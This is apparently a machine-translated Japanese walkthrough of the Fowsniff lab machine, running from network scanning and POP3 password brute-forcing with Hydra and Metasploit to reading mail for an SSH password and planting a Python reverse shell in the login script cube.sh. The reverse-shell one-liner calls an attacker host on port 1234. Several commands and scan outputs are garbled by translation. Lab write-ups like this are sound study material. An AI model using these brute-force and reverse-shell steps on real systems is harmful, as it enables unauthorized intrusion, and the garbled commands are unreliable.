Jump to content

1。情報収集

1.生き残った宿主をスカン

ARP-SCAN-L

cpjegbqlpvf8474.jpg

192.168.1.13がターゲットマシンのIPアドレスであることがわかりました。

2.ポートスキャン

次に、NMAPアーティファクトを使用してターゲットIPアドレスをスキャンします。コマンドは次のとおりです。

root@kali2018:〜#nmap -a192.168.1.13

2019-02-13 01:18 ESTでNMAP 7.70(https://nmap.org)を開始

192.168.1.13のNMAPスキャンレポート

ホストはアップ(0.0014Sレイテンシ)です。

表示されていません: 996閉じたポート

ポートステートサービスバージョン

22/tcpopensshopenssh 7.2p2 ubuntu 4ubuntu2.4(ubuntu linux; Protocol 2.0)

| ssh-hostkey:

|2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)

| 256 53:9D:2:67:34:CF:0A:D5:5A:9A:113:74:BD33333333333333333333:DSE3333333333:DS)

|_256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b13:d7:1b:66:83 (ED25519)

80/tcpopenhttpapache httpd 2.4.18((ubuntu))

| http-robots.txt: 1無効エントリ

| _/

| _http-server-header: apache/2.4.18(ubuntu)

| _HTTP -TITLE: FOWSNIFF CORP-ソリューションの配信

110/TCP OpenPop3Dovecot POP3D

| _pop3-capability: auth-resp-code uidl sasl(plain)パイプラインユーザーCAPAトップリスコード

143/tcp openimapdovecot imapd

| _imap-capabilities:はOKを持っています。

MACアドレス: 08:00336027:1E336080:B0(Oracle VirtualBox Virtual Nic)

デバイスタイプ:汎用

running: linux 3.x | 4.x

OS CPE: CPE:/O:LINUX:LINUX_KERNEL3:3 CPE:/O:LINUX33:LINUX_KERNEL:4

OS詳細: Linux 3.2-4.9

ネットワーク距離: 1ホップ

サービス情報: OS: Linux; CPE: CPE:/O:LINUX:LINUX_KERNEL

Traceroute

ホップrttaddress

11.38 MS 192.168.1.13

OSとサービスの検出が実行されました。誤った結果はhttps://nmap.org/submit/で報告してください。

NMAP DONE: 1 IPアドレス(1ホストアップ)9.44秒でスキャン

tgveahjbftf8475.jpg

スキャンの結果は、4つのポートがオープン、22(SSH)、80(HTTP)、110(POP3)、および143(IMAP)が開いていることを示しています。

2。ターゲットマシンの侵入

1。最初に、ポート80が何かを獲得するかどうかを確認します。ブラウザを開いてアクセスしてください。

0mbrcffb5hd8476.jpg

発表情報を使用して、ページをスクロールする静的HTMLページのように見えます:@fowsniffcorp

syr04jmqwif8477.jpg

ページには何も見つかりませんでしたし、DIRBとNiktoでスキャンを続けることに利益はありませんでした

root@kali2018:〜#dirb http://192.168.1.13

vcn1vn0pptp8478.jpg

root@kali2018:〜#nikto -h http://192.168.1.13

e0e4tmgiifd8479.jpg

だから私はページに表示されたfowsniff Corpをグーグルで検索しました

wbskjpitv4g8480.jpg

粘着性のツイートでFowsniff Twitter(@fowsniffcorp)を見つけました:

ftexfq2jxxi8481.jpg

リンクアドレスhttps://pastebin.com/nraqveexを開いた後、ウェブサイトのメールボックスから漏れた電子メールユーザーとパスワードがページに表示されます。

itic10dxskg8482.jpg

パスワードはMD5形式であり、SODM5(https://www.somd5.com/batch.html)またはHashcatを使用してパスワードを復号化できます。

kccyl2lmjmk8483.jpg

次に、ユーザー名とパスワードの辞書を作成し、Hydraを介してPOP3を爆破します。

まず、すべてのユーザー名をuser.txtファイルに貼り付けて保存し、すべてのパスワードをpass.txtファイルに貼り付けて保存します。

ledftk30uhp8484.jpg

MSFを使用してPOP3ログインを爆破することもできます。コマンドと構成は次のとおりです。

MSFUSEAUXILIARY/SCANNER/POP3/POP3_LOGIN

MSF Auxiliary(Scanner/POP3/POP3_LOGIN)SET RHOSTS192.168.1.13

Rhosts=192.168.1.13

MSF Auxiliary(scanner/pop3/pop3_login)set user_file /opt/user.txtを設定します

user_file=/opt/user.txt

MSF Auxiliary(Scanner/POP3/POP3_LOGIN)SET PASS_FILE /OPT/PASS.TXT

pass_file=/opt/pass.txt

MSF Auxiliary(Scanner/POP3/POP3_LOGIN)はfalseを設定します

verbose=false

MSF補助(スキャナー/POP3/POP3_LOGIN)エクスプロイト

実行後、図に示すように、正しい資格情報「Seina:scoobydoo2」が見つかりました。

te4mgwxv41z8485.jpg

次のように、メールアドレスはHydraを介して爆破されます。

hydra -l users.txt -p pass.txt -f {ip} pop3

-l〜username wordlist

-p〜パスワードワードリスト

-f〜有効なユーザーが見つかったときにひび割れを停止します

root@kali2018:/opt#hydra -l user.txt -p pass.txt -f 192.168.1.13pop3

4yfdqhwvqjt8486.jpg

ユーザー名Seinaと対応するパスワードが正常に爆破されていることがわかります。

次に、ターゲットマシンのPOP3サービスに接続し、取得したばかりの資格情報を使用してログインします。ログインした後、情報を確認して、2つのメッセージを見つけました。コマンドは次のとおりです。

root@kali2018:/opt#nc 192.168.1.13 110

+ok fowsniffコーポレートメールサーバーへようこそ!

ユーザーセイナ

+OK

Scoobydoo2を渡します

+OKログインしました。

リスト

+OK 2メッセージ:

1 1622

2 1280

ry4ddkl0hiu8487.jpg

リストコマンドを使用して、電子メール情報があるかどうかを確認します。 2つのメッセージがあることがわかります。その後、RETR [ID]を使用してメッセージを読み取ります。

最初のメッセージの内容を見て、SSHを含む一時的なパスワードは「s1ck3nbluff + secureShell」であることがわかりました。

ret 1

+OK 1622オクテット

Return-Path: Stone@Fowsniff

X-Original-to: Seina@Fowsniff

: Seina@Fowsniffに配信

fowsniffによる3:(postfix、userid1000から)

ID 0FA3916A;火曜日、2018年3月13日14:51:07 -0400(EDT)

to: baksteen@fowsniff、mauer@fowsniff、mursten@fowsniff、

Mustikka@fowsniff、parede@fowsniff、sciana@fowsniff、seina@fowsniff、

tegel@fowsniff

件名:緊急!セキュリティイベント!

Message-ID: 20180313185107.0FA3916A@FOWSNIFF

日付:火、2018年3月13日14336051:07 -0400(EDT)

From: Stone@Fowsniff(Stone)

親愛なるみんな、

数日前、悪意のある俳優がエントリーを得ることができました

私たちの内部電子メールシステム。攻撃者は悪用することができました

SQLデータベース内で誤ってフィルタリングされた脱出文字

ログイン資格情報にアクセスします。 SQLと認証の両方

システムは、しばらく更新されていなかったレガシー方法を使用しました。

完全な内部システムを実行するように指示されました

オーバーホール。メインシステムは「店内」ですが、

最小限のこの孤立した一時的なサーバーに移動しました

機能。

このサーバーはメールを送信および受信することができますが、

ローカル。つまり、他のユーザーにしかメールで送信できず、

World Wide Webへ。ただし、このシステムにアクセスできます

SSHプロトコル。

SSHの一時的なパスワードは「s1ck3nbluff+secureShell」です

このパスワードをできるだけ早く変更する必要があります。

ガイダンス。私は攻撃者がオンラインで投稿したリークを見ました、そして私はあなたの

パスワードはあまり安全ではありませんでした。

あなたの最も早い都合で私のオフィスで私に会いに来てください、そして私たちはそれをセットアップします。

ありがとう、

A.Jストーン

次に、2番目のメッセージを確認します。メッセージでは、送信者がbaksteen@fowsniffであることがわかります。ユーザー名はBaksteenであると推測できます。

sde4tc0peqc8488.jpg

ret 2

+OK 1280オクテット

return-path: baksteen@fowsniff

X-Original-to: Seina@Fowsniff

: Seina@Fowsniffに配信

fowsniffによる3:(postfix、from userid1004)

ID 101CA1AC2;火曜日、2018年3月13日14:54:05 -0400(EDT)

to: seina@fowsniff

subject:あなたは逃しました!

Message-id: 20180313185405.101ca1ac2@fowsniff

日付:火、2018年3月13日14336054:05 -0400(EDT)

from: baksteen@fowsniff

デヴィン、

あなたは今日、真鍮がAJに横たわるのを見るべきだった!

私たちはこの1つについて話をします。

地域のマネージャーが海軍にいたことを誰が知っていましたか?彼女は船乗りのように誓っていました!

どんな種類の肺炎やあなたが持ち帰るものがわかりません

あなたはあなたのキャンプ旅行からですが、私は自分でそれを持ってくると思います。

あなたはどのくらい去っていましたか - 一週間?

次回は病気になり、世紀の経営者の吹き出物を逃すつもりです

少なくとも自分自身に保管してください!

早く家に帰り、チキンスープを食べます。

私もストーンからメールを受け取ったと思いますが、おそらくいくつかです

「経営陣との私の会議のトーンを説明させてください」と顔を節約します。

戻ってきたら読みます。

気分が良くなる、

スカイラー

PS:メールパスワードを変更してください。

AJは、キャプテンの冒とくが現れる直前にそれをするように言っていました。

kefkup323md8489.jpg

次に、取得したばかりの資格情報、つまりユーザー名:baksteenパスワード:s1ck3nbluff+secureShellを使用してSSHにログインします

root@kali2018:/opt#ssh baksteen@192.168.1.13

jk324swasmh8490.jpg

3。権限の提供

1。最初のタイプの許可強化

ログインに成功しました。システムの列挙後、ユーザーBaksteenが2つの異なるグループに属していることがわかりました。ユーザーグループに属するファイルを見つけようとし、スクリプト「Cube.sh」を見つけました。検索コマンドは次のとおりです。

baksteen@fowsniff:〜 $ find/group users -Type F 2/dev/null

fzhngjaixck8491.jpg

このスクリプトファイルのコンテンツを確認したところ、SSHにログインした後に表示されるインターフェイス情報が含まれていることがわかりました。上記の写真でSSHログインが成功した後、スクリーンショットを比較することでわかります。

baksteen@fowsniff:〜 $ cd /opt /cube

baksteen@fowsniff:/opt/cube $ ls

baksteen@fowsniff:/opt/cube $ cat cube.sh

irexjsipfdd8492.jpg

VIMを使用してファイルを開き、ファイルの最後にPythonリバウンドシェルコマンドの行を追加します。

python-c'importsocket、subprocess、os; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '192.168.1.21 '、1234))

写真に示されているように:

egdhu3ysg528493.jpg

保存後、スクリプトを実行してエラーを報告しようとします。エラーメッセージは「Pythonコマンドが見つかりません」です。そこで、システムでPythonを検索したところ、図に示すように、Python3がインストールされていることがわかりました。

qwx5dg1ty5x8494.jpg

uaze20mgags8495.jpg

そのため、次のように、コマンドをシェルをPython3にリバウンドするように変更します。

python3-c'importsocket、subprocess、os; s=socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '192.168.1.29'、1234)); os.dup2(s.fileno()、0); os.dup2(s.fileno()、1);

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...